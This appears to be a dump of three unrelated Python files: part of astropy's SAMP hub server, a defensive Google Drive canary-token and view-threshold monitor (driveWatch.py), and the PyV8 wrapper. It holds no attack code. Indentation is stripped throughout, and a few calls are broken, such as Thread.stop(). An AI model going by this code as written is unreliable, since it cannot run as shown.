arg_params = (responder_public_id, recipient_msg_tag, response)
samp_method_name = "receiveResponse"
self._retry_method(recipient_private_key, recipient_public_id, samp_method_name, arg_params)
except Exception as exc:
warnings.warn("{} reply from client {} to client {} failed [{}]"
.format(recipient_msg_tag, responder_public_id,
recipient_public_id, exc),
SAMPWarning)
def _retry_method(self, recipient_private_key, recipient_public_id, samp_method_name, arg_params):
"""
This method is used to retry a SAMP call several times.
Parameters
----------
recipient_private_key
The private key of the receiver of the call
recipient_public_id
The public ID of the receiver of the call
samp_method_name : str
The name of the SAMP method to call
arg_params : tuple
Any additional arguments to be passed to the SAMP method
"""
if recipient_private_key is None:
raise SAMPHubError("Invalid client ID")
from . import conf
for attempt in range(conf.n_retries):
if not self._is_running:
time.sleep(0.01)
continue
try:
if (self._web_profile and
recipient_private_key in self._web_profile_callbacks):
# Web Profile
callback = {"samp.methodName": samp_method_name,
"samp.params": arg_params}
self._web_profile_callbacks[recipient_private_key].put(callback)
else:
# Standard Profile
hub = self._xmlrpc_endpoints[recipient_public_id][1]
getattr(hub.samp.client, samp_method_name)(recipient_private_key, *arg_params)
except xmlrpc.Fault as exc:
log.debug("{} XML-RPC endpoint error (attempt {}): {}"
.format(recipient_public_id, attempt + 1,
exc.faultString))
time.sleep(0.01)
else:
return
# If we are here, then the above attempts failed
error_message = "{} failed after {} attempts".format(samp_method_name, conf.n_retries)
raise SAMPHubError(error_message)
def _public_id_to_private_key(self, public_id):
for private_key in self._private_keys.keys():
if self._private_keys[private_key][0] == public_id:
return private_key
return None
def _get_new_hub_msg_id(self, sender_public_id, sender_msg_id):
with self._thread_lock:
self._hub_msg_id_counter += 1
return "msg#{};;{};;{};;{}".format(self._hub_msg_id_counter,
self._hub_public_id,
sender_public_id, sender_msg_id)
def _update_last_activity_time(self, private_key=None):
with self._thread_lock:
self._last_activity_time = time.time()
if private_key is not None:
self._client_activity_time[private_key] = time.time()
def _receive_notification(self, private_key, sender_id, message):
return ""
def _receive_call(self, private_key, sender_id, msg_id, message):
if private_key == self._hub_private_key:
if "samp.mtype" in message and message["samp.mtype"] == "samp.app.ping":
self._reply(self._hub_private_key, msg_id,
{"samp.status": SAMP_STATUS_OK, "samp.result": {}})
elif ("samp.mtype" in message and
(message["samp.mtype"] == "x-samp.query.by-meta" or
message["samp.mtype"] == "samp.query.by-meta")):
ids_list = self._query_by_metadata(message["samp.params"]["key"],
message["samp.params"]["value"])
self._reply(self._hub_private_key, msg_id,
{"samp.status": SAMP_STATUS_OK,
"samp.result": {"ids": ids_list}})
return ""
else:
return ""
def _receive_response(self, private_key, responder_id, msg_tag, response):
return ""
def _web_profile_register(self, identity_info,
client_address=("unknown", 0),
origin="unknown"):
self._update_last_activity_time()
if not client_address[0] in ["localhost", "127.0.0.1"]:
raise SAMPProxyError(403, "Request of registration rejected "
"by the Hub.")
if not origin:
origin = "unknown"
if isinstance(identity_info, dict):
# an old version of the protocol provided just a string with the app name
if "samp.name" not in identity_info:
raise SAMPProxyError(403, "Request of registration rejected "
"by the Hub (application name not "
"provided).")
# Red semaphore for the other threads
self._web_profile_requests_semaphore.put("wait")
# Set the request to be displayed for the current thread
self._web_profile_requests_queue.put((identity_info, client_address,
origin))
# Get the popup dialogue response
response = self._web_profile_requests_result.get()
# OK, semaphore green
self._web_profile_requests_semaphore.get()
if response:
register_map = self._perform_standard_register()
translator_url = ("http://localhost:{}/translator/{}?ref="
.format(self._web_port, register_map["samp.private-key"]))
register_map["samp.url-translator"] = translator_url
self._web_profile_server.add_client(register_map["samp.private-key"])
return register_map
else:
raise SAMPProxyError(403, "Request of registration rejected by "
"the user.")
def _web_profile_allowReverseCallbacks(self, private_key, allow):
self._update_last_activity_time()
if private_key in self._private_keys:
if allow == "0":
if private_key in self._web_profile_callbacks:
del self._web_profile_callbacks[private_key]
else:
self._web_profile_callbacks[private_key] = queue.Queue()
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
return ""
def _web_profile_pullCallbacks(self, private_key, timeout_secs):
self._update_last_activity_time()
if private_key in self._private_keys:
callback = []
callback_queue = self._web_profile_callbacks[private_key]
try:
while self._is_running:
item_queued = callback_queue.get_nowait()
callback.append(item_queued)
except queue.Empty:
pass
return callback
else:
raise SAMPProxyError(5, "Private-key {} expired or invalid."
.format(private_key))
class WebProfileDialog(object):
"""
A base class to make writing Web Profile GUI consent dialogs
easier.
The concrete class must:
1) Poll ``handle_queue`` periodically, using the timer services
of the GUI's event loop. This function will call
``self.show_dialog`` when a request requires authorization.
``self.show_dialog`` will be given the arguments:
- ``samp_name``: The name of the application making the request.
- ``details``: A dictionary of details about the client
making the request.
- ``client``: A hostname, port pair containing the client
address.
- ``origin``: A string containing the origin of the
request.
2) Call ``consent`` or ``reject`` based on the user's response to
the dialog.
"""
def handle_queue(self):
try:
request = self.queue_request.get_nowait()
except queue.Empty: # queue is set but empty
pass
except AttributeError: # queue has not been set yet
pass
else:
if isinstance(request[0], str): # To support the old protocol version
samp_name = request[0]
else:
samp_name = request[0]["samp.name"]
self.show_dialog(samp_name, request[0], request[1], request[2])
def consent(self):
self.queue_result.put(True)
def reject(self):
self.queue_result.put(False)
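# A minimal sketch (not part of astropy) of how WebProfileDialog could be wired up: a
# console dialog subclass that approves every request, polled from a small daemon thread.
# The class name AutoApproveDialog and the 0.1 s poll interval are illustrative assumptions;
# in a real GUI the polling would use the toolkit's own timer, and SAMPHubServer would be
# imported from astropy.vo.samp or astropy.samp depending on the astropy version.
#
# class AutoApproveDialog(WebProfileDialog):
#     def show_dialog(self, samp_name, details, client, origin):
#         print("Web Profile request from", samp_name, "origin:", origin)
#         self.consent()              # call self.reject() instead to refuse
#
# dialog = AutoApproveDialog()
# hub = SAMPHubServer(web_profile_dialog=dialog)
# hub.start(wait=False)
#
# def poll():
#     while hub.is_running:
#         dialog.handle_queue()       # shows the dialog when a request is pending
#         time.sleep(0.1)
#
# poll_thread = threading.Thread(target=poll)
# poll_thread.daemon = True
# poll_thread.start()
# ...
# hub.stop()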
|
driveWatch.py
|
from __future__ import print_function
import httplib2
import os
import time
import webbrowser
import pytz
import json
import threading
import tempfile
import subprocess
import sys
import logging
import logging.handlers
from datetime import datetime, timedelta
from dateutil.parser import parse
from apiclient import discovery
from oauth2client import client
from oauth2client.file import Storage
from collections import namedtuple
SCOPES = 'https://www.googleapis.com/auth/admin.reports.audit.readonly'
CLIENT_SECRET_FILE = 'client_secret.json'
APPLICATION_NAME = 'Reports API Python Quickstart'
EVENT_NAMES = ['create', 'upload', 'edit', 'view', 'rename',
'move', 'add_to_folder', 'remove_from_folder',
'trash', 'delete', 'untrash', 'download', 'preview',
'print', 'change_acl_editors', 'change_document_access_scope',
'change_document_visibility', 'change_user_access',
'team_drive_membership_change']
VIEW_THRESHOLD = 30
MAX_RESULTS = 100
BASELINE_PERCENT = 0.2 # fraction by which to increase a user's baseline (e.g. an average of 10 views/day only alerts above 12)
TOKEN_ALERT=0
USER_ALERT=1
BASELINE_ALERT=2
THRESHOLD_ALERT=3
class Singleton(type):
_instances = {}
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super(Singleton, cls).__call__(*args, **kwargs)
return cls._instances[cls]
class GSuiteTokens(object):
__metaclass__ = Singleton
def __init__(self, cfg_file="config.json"):
self.cfg_file = cfg_file
self.users_view_map = {}
self.document_tokens = {}
self.user_tokens = {}
self.event_loop_thread = None
self.logging = False
self.syslog_logger = None
self.user_baseline_map = {}
dir_name = tempfile.mkdtemp()
self.logfile_doc_tokens = os.path.join(dir_name, 'doc_tokens.log')
self.logfile_user_tokens = os.path.join(dir_name, 'user_tokens.log')
self.logfile_all_activity = os.path.join(dir_name, 'all_activity.log')
self.logfile_user_activity = os.path.join(dir_name, 'user_activity.log')
open(self.logfile_user_tokens, 'a').close()
open(self.logfile_all_activity, 'a').close()
open(self.logfile_user_activity, 'a').close()
open(self.logfile_doc_tokens, 'a').close()
# subprocess.call(['sh', 't.sh', self.logfile_doc_tokens,
# self.logfile_user_tokens, self.logfile_all_activity,
# self.logfile_user_activity])
self.load_cfg()
credentials = self.get_credentials()
http = credentials.authorize(httplib2.Http())
self.service = discovery.build('admin', 'reports_v1', http=http)
def load_cfg(self):
with open(self.cfg_file) as f:
cfg = json.load(f)
if 'document_tokens' not in cfg and 'user_tokens' not in cfg:
raise Exception('No token configuration found')
if 'document_tokens' in cfg:
for document_token in cfg['document_tokens']:
self.document_tokens[document_token['document_id']] = document_token['events']
if 'user_tokens' in cfg:
for user_token in cfg['user_tokens']:
self.user_tokens[user_token['user_email']] = user_token['events']
if 'logging' in cfg:
if 'enabled' in cfg['logging']:
try:
self.logging = bool(int(cfg['logging']['enabled']))
except:
pass
if 'syslog' in cfg:
if 'enabled' in cfg['syslog']:
try:
if bool(int(cfg['syslog']['enabled'])):
self.syslog_logger = logging.getLogger('rsyslog')
rsyslog_h = rsyslog_handler()
self.syslog_logger.addHandler(rsyslog_h)
self.syslog_logger.setLevel(logging.INFO)
except:
pass
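# For reference, a hypothetical config.json matching what load_cfg() above expects
# (the document id, e-mail address and event names below are made-up examples; valid
# event names are listed in EVENT_NAMES at the top of this file):
#
# {
#     "document_tokens": [
#         {"document_id": "1AbCdEfGhIjK", "events": ["view", "download", "change_user_access"]}
#     ],
#     "user_tokens": [
#         {"user_email": "canary@example.com", "events": ["view", "edit"]}
#     ],
#     "logging": {"enabled": "1"},
#     "syslog": {"enabled": "1"}
# }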
def get_credentials(self):
"""Gets valid user credentials from storage.
If nothing has been stored, or if the stored credentials are invalid,
the OAuth2 flow is completed to obtain the new credentials.
Returns:
Credentials, the obtained credential.
"""
home_dir = os.path.expanduser('~')
credential_dir = os.path.join(home_dir, '.credentials')
if not os.path.exists(credential_dir):
os.makedirs(credential_dir)
credential_path = os.path.join(credential_dir,
'admin-reports_v1-python-quickstart.json')
store = Storage(credential_path)
credentials = store.get()
if not credentials or credentials.invalid:
flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES,redirect_uri='urn:ietf:wg:oauth:2.0:oob')
flow.user_agent = APPLICATION_NAME
auth_uri = flow.step1_get_authorize_url()
webbrowser.open(auth_uri)
auth_code = raw_input('Enter the authentication code: ')
credentials = flow.step2_exchange(auth_code)
store.put(credentials)
return credentials
def start_event_loop(self):
if not self.event_loop_thread:
self.event_loop_thread = threading.Thread(target=self._event_loop)
self.event_loop_thread.start()
def stop_event_loop(self):
if self.event_loop_thread:
self.event_loop_thread.stop()
def _event_loop(self):
print("[*] Starting event loop...")
start_time = datetime.utcnow()
d = datetime.utcnow()
d_with_timezone = d.replace(tzinfo=pytz.UTC)
d = d_with_timezone.isoformat()
self.build_user_basline()
print("[*] Drivewatch Ready!")
while True:
results = self.service.activities().list(
startTime=d, userKey='all', applicationName='drive').execute()
activities = results.get('items', [])
if activities:
d = datetime.utcnow()
d_with_timezone = d.replace(tzinfo=pytz.UTC)
d = d_with_timezone.isoformat()
for activity in activities:
for event in activity['events']:
self.token_document(activity['actor']['email'], event)
self.token_user(activity['actor']['email'], event)
self.log_drive_events(activity)
self.user_view_counts(event, activity['actor']['email'], self.service)
if (datetime.utcnow() - start_time) > timedelta(hours=24):
self.build_user_basline()
time.sleep(5)
def build_user_basline(self):
print("[*] Building user baseline...")
tmp_user_view_map = {}
def parse_activities(activities):
for activity in activities:
# get actor info
is_view = False
doc_id = None
for event in activity['events']:
if (event['name'] == 'view'):
is_view = True
for param in event['parameters']:
if param['name'] == 'doc_id':
doc_id = param['value']
break
if doc_id and is_view:
break
try:
actor = activity['actor']['email']
if is_view and actor:
dt = parse(activity['id']['time'])
key = "{actor},{date}".format(actor=actor, date=dt.strftime('%Y-%d-%m'))
if not tmp_user_view_map.get(key):
tmp_user_view_map[key] = []
if not doc_id in tmp_user_view_map[key]:
tmp_user_view_map[key].append(doc_id)
except:
pass
results = self.service.activities().list(
userKey='all', applicationName='drive', maxResults=MAX_RESULTS).execute()
activities = results.get('items', [])
parse_activities(activities)
next_page_token = results.get('nextPageToken', None)
while next_page_token:
results = self.service.activities().list(
userKey='all', applicationName='drive', maxResults=MAX_RESULTS, pageToken=next_page_token).execute()
activities = results.get('items', [])
parse_activities(activities)
next_page_token = results.get('nextPageToken', None)
tmp_map = {}
for key, value in tmp_user_view_map.iteritems():
actor = key.split(',')[0]
if not tmp_map.get(actor):
tmp_map[actor] = []
tmp_map[actor].append(len(value))
for key, value in tmp_map.iteritems():
tmp_map[key] = round(1.0 * sum(value)/len(value))
self.user_baseline_map = tmp_map.copy()
def token_document(self, actor, event):
if self.document_tokens:
owner_email = None
for param in event['parameters']:
if param['name'] == 'owner' and param['value'] in self.user_tokens:
owner_email = param['value']
break
for param in event['parameters']:
if param['name'] == 'doc_id' and \
(param['value'] in self.document_tokens and
event['name'] in self.document_tokens[param['value']]):
self.alert(TOKEN_ALERT, owner=owner_email, doc_id=param['value'], event_type=event['name'], actor=actor)
def token_user(self, actor, event):
if self.user_tokens:
owner_email = None
for param in event['parameters']:
if param['name'] == 'owner' and param['value'] in self.user_tokens:
owner_email = param['value']
break
for param in event['parameters']:
if param['name'] == 'doc_id' and owner_email and \
event['name'] in self.user_tokens[owner_email]:
self.alert(USER_ALERT, actor=actor, owner=owner_email, doc_id=param['value'], event_type=event['name'])
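    # Illustrative note (not part of the original source): self.document_tokens
    # is assumed to map a doc_id to the event names (e.g. 'view') that should
    # raise an alert, and self.user_tokens to map an owner e-mail address to
    # such event names; token_user() only alerts when the actor is not the
    # owner (enforced in alert() below).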
def log_drive_events(self, activity):
if self.logging:
print(activity)
def user_view_counts(self, event, actor, service):
if (event['name'] == 'view'):
if actor in self.users_view_map:
views_and_docs = self.users_view_map[actor]
if (datetime.now() - views_and_docs[0]) > timedelta(hours=24):
self.users_view_map[actor] = (datetime.now(), [])
return
old_time = views_and_docs[0]
docs = views_and_docs[1]
for param in event['parameters']:
if param['name'] == 'doc_id':
doc_id = param['value']
if not doc_id in docs:
docs.append(param['value'])
self.users_view_map[actor] = (old_time, docs)
num_docs_viewed = len(docs)
if num_docs_viewed > VIEW_THRESHOLD:
start_time = datetime.utcnow() - timedelta(hours=24)
start_time_tz = start_time.replace(tzinfo=pytz.UTC)
start_time = start_time_tz.isoformat()
results = service.activities().list(
startTime=start_time, userKey='all', applicationName='drive').execute()
activities = results.get('items', [])
self.alert(THRESHOLD_ALERT, actor=actor, num_docs_viewed=num_docs_viewed)
self.users_view_map[actor] = (datetime.now(), [])
else:
actor_baseline = self.user_baseline_map.get(actor)
if actor_baseline and docs:
baseline = round(actor_baseline*BASELINE_PERCENT) + actor_baseline
if num_docs_viewed > baseline:
self.alert(BASELINE_ALERT, actor=actor, num_docs_viewed=num_docs_viewed, baseline=baseline)
else:
self.users_view_map[actor] = (datetime.now(), [])
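    # Illustrative note (not part of the original source): assuming, for
    # example, VIEW_THRESHOLD = 100 and BASELINE_PERCENT = 0.5 (both constants
    # are defined earlier in this file and may differ), a user with a baseline
    # of 4 views/day raises a BASELINE_ALERT once their distinct views exceed
    # round(4 * 0.5) + 4 = 6, and any user raises a THRESHOLD_ALERT once their
    # distinct views within 24 hours exceed 100.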
def alert(self, alert_type, owner=None, actor=None, num_docs_viewed=None, baseline=None, doc_id=None, event_type=None):
alert_msg = None
if alert_type == TOKEN_ALERT:
alert_msg = "Token fired! {owner}'s document: {doc_id} had the event occur: {event_type} which was made by user: {actor}".format(
owner=owner,
actor=actor,
doc_id=doc_id,
event_type=event_type
)
# TODO write to log file?
elif alert_type == USER_ALERT:
# don't alert when user is doing stuff in his own drive
if owner == actor:
return
alert_msg = "User token fired! {owner}'s document: {doc_id} had the event occur: {event_type} which was made by user: {actor}".format(
owner=owner,
actor=actor,
doc_id=doc_id,
event_type=event_type
)
# TODO write to log file?
elif alert_type == BASELINE_ALERT:
alert_msg = "Actor Baseline Exceeded! {actor}'s view activity was {num_docs_viewed} where baseline was {baseline}.".format(
actor=actor,
num_docs_viewed=num_docs_viewed,
baseline=baseline
)
# TODO write to log file?
elif alert_type == THRESHOLD_ALERT:
alert_msg = "View Threshold Exceeded! {actor}'s view activity was {num_docs_viewed} where the threshold is {threshold}.".format(
actor=actor,
num_docs_viewed=num_docs_viewed,
threshold=VIEW_THRESHOLD
)
# TODO write to log file?
print(alert_msg)
if self.syslog_logger:
self.syslog_logger.critical(alert_msg)
class MySysLogHandler(logging.handlers.SysLogHandler):
    def __init__(self, *args, **kwargs):
from sys import platform
address = '/dev/log'
if platform == "darwin":
address = '/var/run/syslog'
super(MySysLogHandler, self).__init__(address=address, facility=logging.handlers.SysLogHandler.LOG_LOCAL0)
def emit(self, record):
priority = self.encodePriority(self.facility, self.mapPriority(record.levelname))
record.ident = "drivewatch:"
super(MySysLogHandler, self).emit(record)
def rsyslog_handler():
handler = MySysLogHandler()
handler.formatter = logging.Formatter(fmt="%(ident)s %(levelname)s: %(message)s")
return handler
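# Illustrative note (not part of the original source): with the formatter above,
# an alert forwarded via syslog_logger.critical() reaches syslog roughly as
#   drivewatch: CRITICAL: View Threshold Exceeded! alice@example.com's view activity was 120 where the threshold is 100.
# (the local syslog daemon prepends its own timestamp/hostname fields).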
if __name__ == '__main__':
print("[*] Starting Drivewatch...")
if len(sys.argv) >= 2:
g = GSuiteTokens(sys.argv[1])
else:
g = GSuiteTokens()
g.start_event_loop()
PyV8.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, re
import logging
import collections
is_py3k = sys.version_info[0] > 2
if is_py3k:
import _thread as thread
from io import StringIO
str = str
raw_input = input
else:
    import thread
    try:
        from cStringIO import StringIO
    except ImportError:
        from StringIO import StringIO
try:
import json
except ImportError:
import simplejson as json
import _PyV8
__author__ = 'Flier Lu <flier.lu@gmail.com>'
__version__ = '1.0'
__all__ = ["ReadOnly", "DontEnum", "DontDelete", "Internal",
"JSError", "JSObject", "JSArray", "JSFunction",
"JSClass", "JSEngine", "JSContext",
"JSObjectSpace", "JSAllocationAction",
"JSStackTrace", "JSStackFrame", "profiler",
"JSExtension", "JSLocker", "JSUnlocker", "AST"]
class JSAttribute(object):
def __init__(self, name):
self.name = name
def __call__(self, func):
setattr(func, "__%s__" % self.name, True)
return func
ReadOnly = JSAttribute(name='readonly')
DontEnum = JSAttribute(name='dontenum')
DontDelete = JSAttribute(name='dontdel')
Internal = JSAttribute(name='internal')
class JSError(Exception):
def __init__(self, impl):
Exception.__init__(self)
self._impl = impl
def __str__(self):
return str(self._impl)
def __unicode__(self, *args, **kwargs):
return str(self._impl)
def __getattribute__(self, attr):
impl = super(JSError, self).__getattribute__("_impl")
try:
return getattr(impl, attr)
except AttributeError:
return super(JSError, self).__getattribute__(attr)
RE_FRAME = re.compile(r"\s+at\s(?:new\s)?(?P<func>.+)\s\((?P<file>[^:]+):?(?P<row>\d+)?:?(?P<col>\d+)?\)")
RE_FUNC = re.compile(r"\s+at\s(?:new\s)?(?P<func>.+)\s\((?P<file>[^\)]+)\)")
RE_FILE = re.compile(r"\s+at\s(?P<file>[^:]+):?(?P<row>\d+)?:?(?P<col>\d+)?")
@staticmethod
def parse_stack(value):
stack = []
def int_or_nul(value):
return int(value) if value else None
for line in value.split('\n')[1:]:
m = JSError.RE_FRAME.match(line)
if m:
stack.append((m.group('func'), m.group('file'), int_or_nul(m.group('row')), int_or_nul(m.group('col'))))
continue
m = JSError.RE_FUNC.match(line)
if m:
stack.append((m.group('func'), m.group('file'), None, None))
continue
m = JSError.RE_FILE.match(line)
if m:
stack.append((None, m.group('file'), int_or_nul(m.group('row')), int_or_nul(m.group('col'))))
continue
assert line
return stack
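    # Illustrative note (not part of the original source): given a V8 trace like
    #   Error: err
    #       at f (test1:2:19)
    #       at test3:1:1
    # parse_stack() skips the first line and returns
    #   [('f', 'test1', 2, 19), (None, 'test3', 1, 1)]
    # i.e. (function, script, line, column) tuples, with None for missing parts.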
@property
def frames(self):
return self.parse_stack(self.stackTrace)
_PyV8._JSError._jsclass = JSError
JSObject = _PyV8.JSObject
JSArray = _PyV8.JSArray
JSFunction = _PyV8.JSFunction
# contribute by e.generalov
JS_ESCAPABLE = re.compile(r'([^\x00-\x7f])')
HAS_UTF8 = re.compile(r'[\x80-\xff]')
def _js_escape_unicode_re_callack(match):
n = ord(match.group(0))
if n < 0x10000:
return '\\u%04x' % (n,)
else:
# surrogate pair
n -= 0x10000
s1 = 0xd800 | ((n >> 10) & 0x3ff)
s2 = 0xdc00 | (n & 0x3ff)
return '\\u%04x\\u%04x' % (s1, s2)
def js_escape_unicode(text):
"""Return an ASCII-only representation of a JavaScript string"""
    if isinstance(text, bytes):
        # bytes input is assumed to be UTF-8 encoded; str has no decode() on Python 3
        text = text.decode('UTF-8')
return str(JS_ESCAPABLE.sub(_js_escape_unicode_re_callack, text))
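# Illustrative examples (not part of the original source): js_escape_unicode(u'人')
# returns the six literal characters \u4eba, and a non-BMP character such as
# U+1F600 is emitted as the surrogate pair \ud83d\ude00; plain ASCII text passes
# through untouched.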
class JSExtension(_PyV8.JSExtension):
def __init__(self, name, source, callback=None, dependencies=[], register=True):
_PyV8.JSExtension.__init__(self, js_escape_unicode(name), js_escape_unicode(source), callback, dependencies, register)
def func_apply(self, thisArg, argArray=[]):
if isinstance(thisArg, JSObject):
return self.invoke(thisArg, argArray)
this = JSContext.current.eval("(%s)" % json.dumps(thisArg))
return self.invoke(this, argArray)
JSFunction.apply = func_apply
class JSLocker(_PyV8.JSLocker):
def __enter__(self):
self.enter()
if JSContext.entered:
self.leave()
raise RuntimeError("Lock should be acquired before enter the context")
return self
def __exit__(self, exc_type, exc_value, traceback):
if JSContext.entered:
self.leave()
raise RuntimeError("Lock should be released after leave the context")
self.leave()
if is_py3k:
def __bool__(self):
return self.entered()
else:
def __nonzero__(self):
return self.entered()
class JSUnlocker(_PyV8.JSUnlocker):
def __enter__(self):
self.enter()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.leave()
if is_py3k:
def __bool__(self):
return self.entered()
else:
def __nonzero__(self):
return self.entered()
class JSClass(object):
__properties__ = {}
__watchpoints__ = {}
def __getattr__(self, name):
if name == 'constructor':
return JSClassConstructor(self.__class__)
if name == 'prototype':
return JSClassPrototype(self.__class__)
prop = self.__dict__.setdefault('__properties__', {}).get(name, None)
        if prop and callable(prop[0]):
return prop[0]()
raise AttributeError(name)
def __setattr__(self, name, value):
prop = self.__dict__.setdefault('__properties__', {}).get(name, None)
        if prop and callable(prop[1]):
return prop[1](value)
return object.__setattr__(self, name, value)
def toString(self):
"Returns a string representation of an object."
return "[object %s]" % self.__class__.__name__
def toLocaleString(self):
"Returns a value as a string value appropriate to the host environment's current locale."
return self.toString()
def valueOf(self):
"Returns the primitive value of the specified object."
return self
def hasOwnProperty(self, name):
"Returns a Boolean value indicating whether an object has a property with the specified name."
return hasattr(self, name)
def isPrototypeOf(self, obj):
"Returns a Boolean value indicating whether an object exists in the prototype chain of another object."
raise NotImplementedError()
def __defineGetter__(self, name, getter):
"Binds an object's property to a function to be called when that property is looked up."
self.__properties__[name] = (getter, self.__lookupSetter__(name))
def __lookupGetter__(self, name):
"Return the function bound as a getter to the specified property."
return self.__properties__.get(name, (None, None))[0]
def __defineSetter__(self, name, setter):
"Binds an object's property to a function to be called when an attempt is made to set that property."
self.__properties__[name] = (self.__lookupGetter__(name), setter)
def __lookupSetter__(self, name):
"Return the function bound as a setter to the specified property."
return self.__properties__.get(name, (None, None))[1]
def watch(self, prop, handler):
"Watches for a property to be assigned a value and runs a function when that occurs."
self.__watchpoints__[prop] = handler
def unwatch(self, prop):
"Removes a watchpoint set with the watch method."
del self.__watchpoints__[prop]
class JSClassConstructor(JSClass):
def __init__(self, cls):
self.cls = cls
@property
def name(self):
return self.cls.__name__
def toString(self):
return "function %s() {\n [native code]\n}" % self.name
def __call__(self, *args, **kwds):
return self.cls(*args, **kwds)
class JSClassPrototype(JSClass):
def __init__(self, cls):
self.cls = cls
@property
def constructor(self):
return JSClassConstructor(self.cls)
@property
def name(self):
return self.cls.__name__
class JSDebugProtocol(object):
"""
Support the V8 debugger JSON based protocol.
<http://code.google.com/p/v8/wiki/DebuggerProtocol>
"""
class Packet(object):
REQUEST = 'request'
RESPONSE = 'response'
EVENT = 'event'
def __init__(self, payload):
            self.data = json.loads(payload) if isinstance(payload, str) else payload
@property
def seq(self):
return self.data['seq']
@property
def type(self):
return self.data['type']
class Request(Packet):
@property
def cmd(self):
return self.data['command']
@property
def args(self):
return self.data['args']
class Response(Packet):
@property
def request_seq(self):
return self.data['request_seq']
@property
def cmd(self):
return self.data['command']
@property
def body(self):
return self.data['body']
@property
def running(self):
return self.data['running']
@property
def success(self):
return self.data['success']
@property
def message(self):
return self.data['message']
class Event(Packet):
@property
def event(self):
return self.data['event']
@property
def body(self):
return self.data['body']
def __init__(self):
self.seq = 0
def nextSeq(self):
seq = self.seq
self.seq += 1
return seq
def parsePacket(self, payload):
obj = json.loads(payload)
return JSDebugProtocol.Event(obj) if obj['type'] == 'event' else JSDebugProtocol.Response(obj)
class JSDebugEvent(_PyV8.JSDebugEvent):
class FrameData(object):
def __init__(self, frame, count, name, value):
self.frame = frame
self.count = count
self.name = name
self.value = value
def __len__(self):
return self.count(self.frame)
def __iter__(self):
for i in range(self.count(self.frame)):
yield (self.name(self.frame, i), self.value(self.frame, i))
class Frame(object):
def __init__(self, frame):
self.frame = frame
@property
def index(self):
return int(self.frame.index())
@property
def function(self):
return self.frame.func()
@property
def receiver(self):
return self.frame.receiver()
@property
def isConstructCall(self):
return bool(self.frame.isConstructCall())
@property
def isDebuggerFrame(self):
return bool(self.frame.isDebuggerFrame())
@property
def argumentCount(self):
return int(self.frame.argumentCount())
def argumentName(self, idx):
return str(self.frame.argumentName(idx))
def argumentValue(self, idx):
return self.frame.argumentValue(idx)
@property
def arguments(self):
return JSDebugEvent.FrameData(self, self.argumentCount, self.argumentName, self.argumentValue)
def localCount(self, idx):
return int(self.frame.localCount())
def localName(self, idx):
return str(self.frame.localName(idx))
def localValue(self, idx):
return self.frame.localValue(idx)
@property
def locals(self):
return JSDebugEvent.FrameData(self, self.localCount, self.localName, self.localValue)
@property
def sourcePosition(self):
return self.frame.sourcePosition()
@property
def sourceLine(self):
return int(self.frame.sourceLine())
@property
def sourceColumn(self):
return int(self.frame.sourceColumn())
@property
def sourceLineText(self):
return str(self.frame.sourceLineText())
def evaluate(self, source, disable_break = True):
return self.frame.evaluate(source, disable_break)
@property
def invocationText(self):
return str(self.frame.invocationText())
@property
def sourceAndPositionText(self):
return str(self.frame.sourceAndPositionText())
@property
def localsText(self):
return str(self.frame.localsText())
def __str__(self):
return str(self.frame.toText())
class Frames(object):
def __init__(self, state):
self.state = state
def __len__(self):
return self.state.frameCount
def __iter__(self):
for i in range(self.state.frameCount):
yield self.state.frame(i)
class State(object):
def __init__(self, state):
self.state = state
@property
def frameCount(self):
return int(self.state.frameCount())
def frame(self, idx = None):
return JSDebugEvent.Frame(self.state.frame(idx))
@property
def selectedFrame(self):
return int(self.state.selectedFrame())
@property
def frames(self):
return JSDebugEvent.Frames(self)
def __repr__(self):
s = StringIO()
try:
for frame in self.frames:
s.write(str(frame))
return s.getvalue()
finally:
s.close()
class DebugEvent(object):
pass
class StateEvent(DebugEvent):
__state = None
@property
def state(self):
if not self.__state:
self.__state = JSDebugEvent.State(self.event.executionState())
return self.__state
class BreakEvent(StateEvent):
type = _PyV8.JSDebugEvent.Break
def __init__(self, event):
self.event = event
class ExceptionEvent(StateEvent):
type = _PyV8.JSDebugEvent.Exception
def __init__(self, event):
self.event = event
class NewFunctionEvent(DebugEvent):
type = _PyV8.JSDebugEvent.NewFunction
def __init__(self, event):
self.event = event
class Script(object):
def __init__(self, script):
self.script = script
@property
def source(self):
return self.script.source()
@property
def id(self):
return self.script.id()
@property
def name(self):
return self.script.name()
@property
def lineOffset(self):
return self.script.lineOffset()
@property
def lineCount(self):
return self.script.lineCount()
@property
def columnOffset(self):
return self.script.columnOffset()
@property
def type(self):
return self.script.type()
def __repr__(self):
return "<%s script %s @ %d:%d> : '%s'" % (self.type, self.name,
self.lineOffset, self.columnOffset,
self.source)
class CompileEvent(StateEvent):
def __init__(self, event):
self.event = event
@property
def script(self):
if not hasattr(self, "_script"):
setattr(self, "_script", JSDebugEvent.Script(self.event.script()))
return self._script
def __str__(self):
return str(self.script)
class BeforeCompileEvent(CompileEvent):
type = _PyV8.JSDebugEvent.BeforeCompile
def __init__(self, event):
JSDebugEvent.CompileEvent.__init__(self, event)
def __repr__(self):
return "before compile script: %s\n%s" % (repr(self.script), repr(self.state))
class AfterCompileEvent(CompileEvent):
type = _PyV8.JSDebugEvent.AfterCompile
def __init__(self, event):
JSDebugEvent.CompileEvent.__init__(self, event)
def __repr__(self):
return "after compile script: %s\n%s" % (repr(self.script), repr(self.state))
onMessage = None
onBreak = None
onException = None
onNewFunction = None
onBeforeCompile = None
onAfterCompile = None
class JSDebugger(JSDebugProtocol, JSDebugEvent):
def __init__(self):
JSDebugProtocol.__init__(self)
JSDebugEvent.__init__(self)
def __enter__(self):
self.enabled = True
return self
def __exit__(self, exc_type, exc_value, traceback):
self.enabled = False
@property
def context(self):
if not hasattr(self, '_context'):
self._context = JSContext(ctxt=_PyV8.debug().context)
return self._context
def isEnabled(self):
return _PyV8.debug().enabled
def setEnabled(self, enable):
dbg = _PyV8.debug()
if enable:
dbg.onDebugEvent = self.onDebugEvent
dbg.onDebugMessage = self.onDebugMessage
dbg.onDispatchDebugMessages = self.onDispatchDebugMessages
else:
dbg.onDebugEvent = None
dbg.onDebugMessage = None
dbg.onDispatchDebugMessages = None
dbg.enabled = enable
enabled = property(isEnabled, setEnabled)
def onDebugMessage(self, msg, data):
if self.onMessage:
self.onMessage(json.loads(msg))
